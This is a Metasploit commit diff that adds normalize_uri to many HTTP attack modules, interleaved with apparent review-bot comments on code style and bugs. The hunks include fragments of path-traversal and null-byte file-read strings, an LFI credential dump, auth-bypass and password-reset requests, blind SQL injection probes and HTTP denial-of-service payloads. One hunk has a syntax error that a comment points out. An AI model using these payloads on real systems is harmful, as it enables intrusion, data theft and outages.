Add normalize_uri to modules that may have
been missed by PULL 1045.

Please ensure PULL 1045 is in place prior to
looking at this (as it implements normalize_uri)

ref --> rapid7#1045
ChrisJohnRiley committed Nov 8, 2012
1 parent 3df9dfc commit f88ec5c
Showing 178 changed files with 413 additions and 425 deletions.
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
Expand Up @@ -79,8 +79,9 @@ def run_host(ip)
print_status("Issuing password change request for: " + datastore['USERNAME'])

begin
uri = normalize_uri(datastore['TARGETURI'])
res = send_request_cgi({
'uri' => target_uri.path,
'uri' => uri,
'method' => 'POST',
'data' => data,
'headers' =>
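Review bot: `uri = normalize_uri(datastore['TARGETURI'])` reads the raw option string, whereas the line it replaces sent `target_uri.path` and the other modules in this commit (scrutinizer_add_user.rb, for example) normalise `target_uri.path`. How `target_uri` parses the option is not shown on this page, but if TARGETURI is ever set with a query string or a full URL the raw value now ends up in `'uri'`, which the old code avoided. I would write `uri = normalize_uri(target_uri.path)` here to stay consistent. run_host starts and ends outside the hunk.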
2 changes: 1 addition & 1 deletion modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
Expand Up @@ -48,7 +48,7 @@ def run_host(ip)
res = send_request_raw(
{
'method' => 'POST',
'uri' => datastore['URL'] + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
}, 25)

if (res and res.code == 500)
4 changes: 2 additions & 2 deletions modules/auxiliary/admin/http/iis_auth_bypass.rb
Expand Up @@ -43,7 +43,7 @@ def initialize(info = {})


def has_auth
uri = target_uri.path
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'

res = send_request_cgi({
Expand All @@ -56,7 +56,7 @@ def has_auth
end

def try_auth
uri = target_uri.path
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'
uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"

2 changes: 1 addition & 1 deletion modules/auxiliary/admin/http/intersil_pass_reset.rb
Expand Up @@ -73,7 +73,7 @@ def run
@peer = "#{rhost}:#{rport}"
return if check != Exploit::CheckCode::Vulnerable

uri = target_uri.path
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'

res = send_request_cgi({
2 changes: 1 addition & 1 deletion modules/auxiliary/admin/http/jboss_seam_exec.rb
Expand Up @@ -42,7 +42,7 @@ def initialize(info = {})
end

def run
jbr = datastore['JBOSS_ROOT']
jbr = normalize_uri(datastore['JBOSS_ROOT'])
cmd_enc = ""
cmd_enc << Rex::Text.uri_encode(datastore["CMD"])

3 changes: 2 additions & 1 deletion modules/auxiliary/admin/http/scrutinizer_add_user.rb
Expand Up @@ -45,9 +45,10 @@ def initialize(info = {})
end

def run
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'uri' => uri,
'vars_post' => {
'tool' => 'userprefs',
'newUser' => datastore['USERNAME'],
4 changes: 2 additions & 2 deletions modules/auxiliary/admin/http/typo3_sa_2009_001.rb
Expand Up @@ -68,6 +68,7 @@ def run
# Null byte fixed in PHP 5.3.4
#

uri = normalize_uri(datastore['URI'])
case datastore['RFILE']
when nil
# Nothing
Expand Down Expand Up @@ -100,8 +101,7 @@ def run
juhash = Digest::MD5.hexdigest(juarray)
juhash = juhash[0..9] # shortMD5 value for use as juhash

file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")

begin
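Review bot: Dropping `file_uri = file_uri.sub("//", "/")` in the second hunk lets a leading double slash come back when URI is `/`, because `"#{uri}/index.php?..."` then starts with `//index.php` unless normalize_uri returns an empty string for a bare slash, which this page does not show. Normalising the joined path keeps the old guarantee: `file_uri = normalize_uri("#{uri}/index.php") + "?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"`. The query string is kept outside the call so the helper only ever sees a path. `run` starts and ends outside both hunks.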
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/tikiwiki/tikidblib.rb
Expand Up @@ -52,7 +52,8 @@ def initialize(info = {})
def run
print_status("Establishing a connection to the target...")

rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
uri = normalize_uri(datastore['URI'])
rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="

res = send_request_raw({
'uri' => rpath,
3 changes: 2 additions & 1 deletion modules/auxiliary/admin/webmin/file_disclosure.rb
Expand Up @@ -70,7 +70,8 @@ def initialize(info = {})
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")

uri = Rex::Text.uri_encode(datastore['DIR']) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
dir = normalize_uri(datastore['DIR'])
uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])

res = send_request_raw({
'uri' => uri,
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/apache_range_dos.rb
Expand Up @@ -50,7 +50,7 @@ def initialize(info = {})
end

def run
uri = datastore['URI']
uri = normalize_uri(datastore['URI'])
ranges = ''
for i in (0..1299) do
ranges += ",5-" + i.to_s
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/hashcollision_dos.rb
Expand Up @@ -202,7 +202,7 @@ def run
print_status("Sending request ##{x}...")
opts = {
'method' => 'POST',
'uri' => datastore['URL'],
'uri' => normalize_uri(datastore['URL']),
'data' => payload
}
begin
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/sonicwall_ssl_format.rb
Expand Up @@ -55,7 +55,7 @@ def run
fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp
begin
res = send_request_raw({
'uri' => datastore['URI'] + fmt,
'uri' => normalize_uri(datastore['URI']) + fmt,
})

if res and res.code == 200
2 changes: 1 addition & 1 deletion modules/auxiliary/dos/http/webrick_regex.rb
Expand Up @@ -44,7 +44,7 @@ def initialize(info = {})
def run
begin
o = {
'uri' => datastore['URI'] || '/',
'uri' => normalize_uri(datastore['URI']) || '/',
'headers' => {
'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
}
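Review bot: In `'uri' => normalize_uri(datastore['URI']) || '/'` the `|| '/'` fallback is now evaluated after the call, so an unset URI is handed to normalize_uri as nil and the default only applies if that helper itself returns nil or false. normalize_uri is not shown on this page, but if it calls String methods on its argument this raises instead of falling back, and if it always returns a String the fallback is dead code. Moving the default inside the call keeps the previous behaviour: `'uri' => normalize_uri(datastore['URI'] || '/'),`.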
5 changes: 3 additions & 2 deletions modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
Expand Up @@ -52,15 +52,16 @@ def initialize(info = {})


def run
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{datastore['URI']}")
uri = normalize_uri(datastore['URI'])
print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")

begin
while(1)
begin
connect
payload = "C=A&" * 40000
length = payload.size
sploit = "HEAD #{datastore['URI']} HTTP/1.1\r\n"
sploit = "HEAD #{uri} HTTP/1.1\r\n"
sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
sploit << "Connection:Close\r\n"
sploit << "Content-Type: application/x-www-form-urlencoded\r\n"
4 changes: 2 additions & 2 deletions modules/auxiliary/fuzzers/http/http_form_field.rb
Expand Up @@ -484,7 +484,7 @@ def run
print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']}")
response = send_request_raw(
{
'uri' => datastore['URL'],
'uri' => normalize_uri(datastore['URL']),
'version' => '1.1',
'method' => 'GET',
'headers' => @get_data_headers
Expand All @@ -502,7 +502,7 @@ def run

response = send_request_raw(
{
'uri' => datastore['URL'],
'uri' => normalize_uri(datastore['URL']),
'version' => '1.1',
'method' => 'GET',
'headers' => @get_data_headers
Expand Up @@ -47,8 +47,9 @@ def initialize(info = {})
def run_host(ip)

print_status("#{rhost}:#{rport} - Sending request...")
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => "/#{target_uri.to_s}",
'uri' => uri,
'method' => 'GET',
})
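Review bot: Replacing `'uri' => "/#{target_uri.to_s}"` with `normalize_uri(target_uri.path)` means only the path component is sent, so a query string that an operator included in TARGETURI would presumably no longer reach the request. The same switch from `target_uri.to_s` to `target_uri.path` is made in both requests of atlassian_crowd_fileaccess.rb. If that is intended, a comment above the assignment such as `# only the path of TARGETURI is used; any query string is ignored` would make it explicit; otherwise the query has to be re-appended after normalisation. The file name of this section is not shown on the page, and run_host continues outside the hunk.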

6 changes: 4 additions & 2 deletions modules/auxiliary/scanner/http/apache_userdir_enum.rb
Expand Up @@ -60,7 +60,8 @@ def initialize
end

def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end

def run_host(ip)
Expand Down Expand Up @@ -88,7 +89,8 @@ def run_host(ip)
def do_login(user)

vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
payload = "#{datastore['URI']}~#{user}/"
uri = normalize_uri(datastore['URI'])
payload = "#{uri}~#{user}/"
begin
res = send_request_cgi(
{
6 changes: 4 additions & 2 deletions modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
Expand Up @@ -58,8 +58,9 @@ def rport
end

def run_host(ip)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => target_uri.to_s,
'uri' => uri,
'method' => 'GET'})

if not res
Expand All @@ -71,6 +72,7 @@ def run_host(ip)
end

def accessfile(rhost)
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")

soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
Expand Down Expand Up @@ -122,7 +124,7 @@ def accessfile(rhost)
data << '</soap:attributes>' + "\r\n"

res = send_request_cgi({
'uri' => target_uri.to_s,
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,
11 changes: 6 additions & 5 deletions modules/auxiliary/scanner/http/axis_local_file_include.rb
Expand Up @@ -47,11 +47,12 @@ def initialize
end

def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end

def run_host(ip)
uri = datastore['URI']
uri = normalize_uri(datastore['URI'])

begin
res = send_request_raw({
Expand All @@ -62,11 +63,11 @@ def run_host(ip)
if (res and res.code == 200)
extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
new_uri = "/axis2/services/#{$1}"

new_uri = normalize_uri(new_uri)
get_credentials(new_uri)

else
print_status("#{target_url} - Apache Axis - The remote page not accessible")
print_status("#{uri} - Apache Axis - The remote page not accessible")
return

end
Expand All @@ -86,7 +87,7 @@ def get_credentials(uri)
'uri' => "#{uri}" + lfi_payload,
}, 25)

print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
print_status("#{uri} - Apache Axis - Dumping administrative credentials")

if (res and res.code == 200)
if res.body.to_s.match(/axisconfig/)
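Review bot: Both status lines now print `#{uri}` where they used to print `#{target_url}`, so the output of this scanner no longer says which host and port a message refers to; in get_credentials `uri` is the service path passed in, so "Dumping administrative credentials" is reported against a bare path. Keeping the host in the prefix avoids that, e.g. `print_status("#{rhost}:#{rport}#{uri} - Apache Axis - The remote page not accessible")`. Separately, the new `new_uri = normalize_uri(new_uri)` still works on a string built from `$1` without checking that the match on the line above succeeded; `return unless extract_uri` before building `new_uri` would skip the request when no service name was found. run_host and get_credentials both continue outside the hunks.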
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/http/backup_file.rb
Expand Up @@ -53,7 +53,7 @@ def run_host(ip)
]

bakextensions.each do |ext|
file = datastore['PATH']+ext
file = normalize_uri(datastore['PATH'])+ext
check_for_file(file)
end
if datastore['PATH'] =~ %r#(.*)(/.+$)#
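Review bot: `normalize_uri(datastore['PATH'])` is evaluated inside the `bakextensions.each` block on every iteration, while the `if datastore['PATH'] =~ %r#(.*)(/.+$)#` test right after the loop still matches against the raw option. Hoisting it once before the loop, `path = normalize_uri(datastore['PATH'])`, and using `file = path + ext` and `if path =~ %r#(.*)(/.+$)#` keeps both branches working from the same value. What the `if` body builds is outside the hunk, so whether it relies on the un-normalised form should be checked there.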
Expand Up @@ -51,11 +51,12 @@ def initialize
end

def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
uri = normalize_uri(datastore['URI']
"http://#{vhost}:#{rport}#{uri}"
end

def run_host(ip)
uri = datastore['URI']
uri = normalize_uri(datastore['URI'])
file = datastore['FILE']
payload = "?locale=/../../../../../../..#{file}%00"
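Review bot: `uri = normalize_uri(datastore['URI']` in target_url is missing its closing parenthesis, so this file will not parse and the module cannot be loaded. It should read `uri = normalize_uri(datastore['URI'])`, exactly as the same call in run_host a few lines below does. The file name of this section is not shown on the page.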

Expand Up @@ -49,7 +49,7 @@ def initialize(info = {})


def run_host(ip)
base = target_uri.path
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'

peer = "#{ip}:#{rport}"
12 changes: 6 additions & 6 deletions modules/auxiliary/scanner/http/blind_sql_query.rb
Expand Up @@ -141,7 +141,7 @@ def run_host(ip)
#SEND NORMAL REQUEST
begin
normalres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => gvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand Down Expand Up @@ -189,7 +189,7 @@ def run_host(ip)

begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => testgvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand All @@ -206,7 +206,7 @@ def run_host(ip)

begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => testgvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand Down Expand Up @@ -236,7 +236,7 @@ def run_host(ip)
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => datastore['PATH'],
:path => normalize_uri(datastore['PATH']),
:method => http_method,
:pname => key,
:proof => "blind sql inj.",
Expand Down Expand Up @@ -272,7 +272,7 @@ def run_host(ip)

begin
trueres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => gvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
Expand All @@ -297,7 +297,7 @@ def run_host(ip)

begin
falseres = send_request_cgi({
'uri' => datastore['PATH'],
'uri' => normalize_uri(datastore['PATH']),
'vars_get' => gvars,
'method' => http_method,
'ctype' => 'application/x-www-form-urlencoded',
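Review bot: `normalize_uri(datastore['PATH'])` is repeated in five `send_request_cgi` calls and again in the `:path` entry of the hash at line 236 across the hunks of this file. Assigning it once near the top of run_host, `path = normalize_uri(datastore['PATH'])`, and passing `'uri' => path` and `:path => path` removes the repetition and guarantees that the path recorded in the finding is the one that was actually requested. run_host starts and ends outside the hunks shown, so the best place for the assignment has to be picked in the full file.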
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/http/brute_dirs.rb
Expand Up @@ -59,7 +59,7 @@ def run_host(ip)

conn = false

tpath = datastore['PATH']
tpath = normalize_uri(datastore['PATH'])
if tpath[-1,1] != '/'
tpath += '/'
end
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/http/clansphere_traversal.rb
Expand Up @@ -45,7 +45,7 @@ def initialize(info = {})


def run_host(ip)
base = target_uri.path
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'

peer = "#{ip}:#{rport}"
Expand Up @@ -57,7 +57,7 @@ def initialize

def run_host(ip)

url = datastore['URL']
url = normalize_uri(datastore['URL'])
locale = "?locale="
trav = datastore['PATH']
